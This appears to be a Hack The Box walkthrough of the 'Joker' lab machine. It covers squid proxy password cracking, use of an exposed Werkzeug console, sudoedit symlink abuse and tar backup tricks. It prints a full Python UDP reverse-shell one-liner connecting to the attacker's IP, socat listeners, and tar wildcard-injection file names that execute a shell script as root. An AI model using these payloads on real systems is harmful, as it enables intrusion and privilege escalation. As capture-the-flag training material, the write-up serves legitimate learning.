JOKER — HTB walkthrough
Toughest of all boxes. A lots and lots of hints required. Learnt many things. Writing this walkthrough to share learning at different points during machine.
ENUMERATION
OpenSSH Enum
SQUID Proxy Enum
Nikto scan using proxy
Seems there is no attack surface. Let’s think again and start enum again.
UDP Nmap scan revealed 2ports open
root@kali:~/Downloads/htb/Joker# nmap -sU -A 10.10.10.21
What do we require ?
1) SSH keys to enter and gain shell (or)
2) SQUID authentication creds
2) Googling location of SQUID files I see
On our machine we have got squid.conf
Here it gives us idea, that there is password in /etc/squid/passwords. Let’s extract that file from TFTP too. It should contain password for KALAMARI, as indicated to us by nikto scan, when it failed authentication.
Cracking Password : Using john for /etc/squid/password
Setting browser to process proxy for squid. For this we will set our foxy-proxy by adding new proxy details
Keeping this on we run our Nikto scan
After a while I found I was doing this wrong. Our host should be 127.0.0.1 and proxy 10.10.10.21:3128
Running again: nikto -h 127.0.0.1 -useproxy http://10.10.10.21:3128
Visiting browser 127.0.0.1 < keeping joker proxy on >
Nothing juicy here. Looking at nikto scan results we see a directory named /console open. Visiting it we see we can run python commands there
EXPLOITATION
Now we will use python reverse shell to connect to us
And keeping netcat listener on at 1234. root@kali~:#Nc -lvp 1234
WOOOOOSSHHHHH !!!! It didn’t work and I was losing console again and again. After a lot of enum I found this was not connecting back to TCP. And that we would require UDP reverse shell
Searching for python pty shell github, I found one link for UDP connect
https://github.com/infodox/python-pty-shells/blob/master/udp_pty_backconnect.py. So using following command.
>>> import subprocess; subprocess.Popen([“python”, “-c”, ‘import os;import pty;import socket;s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM);s.connect((\”10.10.14.19\”, 1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv(\”HISTFILE\”,\”/dev/null\”);pty.spawn(\”/bin/sh\”);s.close()’])
Also this won’t give back connection on ncat using udp . So we will require socat connection.
root@kali:~/Downloads/htb/Joker# socat file:`tty`,echo=0,raw udp-listen:1234
checking sudo privileges we see we have permission to write layout.html
So we will try to make directory and copy value of ssh keys to layout.html
But here comes the problem. You cannot copy back this to ssh of alekos. So instead of copy pasting. We will create a symlink to ssh/authorized_keys.
What will this do is :
1) when we create a symlink of a folder to other , what is does it whenever folder is accessed it redirects its contents to destination folder.
Example
ln -s /mnt/external-drive ~/mydrive
In the following example a mounted external drive is symlinked into a home directory. This allows for convenient browsing of the external drive within the home directory, because all contents to /mnt/external-drive is now available on mydrive
2) So here we do is create a symlink of layout.html to ssh/authorized_keys. This will let contents of layout.html accessible in ssh/authorized_keys, thus when we write our id_rsa.pub it will be accessible to authorized_keys of alekos. Therefore allowing us to ssh into alekos without password.
3)So just remove previously created layout.html and first create a symlink.
@joker:~/testing/n00bDI$ ln -s /home/alekos/.ssh/authorized_keys layout.html
Now we will write of id_rsa.pub to layout.html in folder we created using wildcard vulnerability. And then write our id_rsa.pub there as we did earlier.
werkzeug@joker:~/testing/n00bDI$ sudoedit -u alekos /var/www/testing/n00bDI/layout.html
Nano commands
Ctrl+v : to paste the key; Ctrl+o : to write the file ; Enter : to not give new name and save as it is.
After doing this we can ssh to alekos from other terminal as follows
PRIVILEGE ESCALATION
We found a folder backup containing backups of development folder for every five minutes
We observe here is all tar files are owned by root and are readable by alekos. These are backups of development folder and backups is done every five minutes.
Now what if we first move development to some other directory say development.bak and make symlink of development in root.
This will cause the backup folder to ask tar command to get contents from development folder, which is not having symlink to root, so in actual whatever be the contents in root will be access by tar command, instead of actual development. This will cause tar command to create a tar file containing compressed data in root folder. Which we can extract later to read root.txt
1) Move development to development.bak and create symlink
We see content of development is available in root, which is enough to fool tar command. After 5 mins when backup is created and we extract the content of folders we get root.txt , i.e. content of root in tar file.
For this go to backup create a folder extract and move latest created tar file to extract and extract it over there.
Got root flag……
What about rooting the machine. We still aren’t root.
1) there is vulnerability in wildcard we can see here.
https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt
This would require box to be reset. If you want this, do as follows
In development folder create files
alekos@joker:~/development$ touch — — checkpoint=1
alekos@joker:~/development$ touch — ‘ — checkpoint-action=exec=python shell.py’
alekos@joker:~/development$ nano shell.py
In shell.py write our python udp reverse shell command
#!/usr/bin/python
import subprocess
subprocess.Popen([“python”, “-c”, ‘import os;import pty;import socket;s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM);s.connect((\”10.10.14.19\”, 1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv(\”HISTFILE\”,\”/dev/null\”);pty.spawn(\”/bin/sh\”);s.close()’
On your machine keep socat listener on at 1234
socat file:`tty`,echo=0,raw udp-listen:1234
And waiting for 5 mins for backup to be created. You get the root.
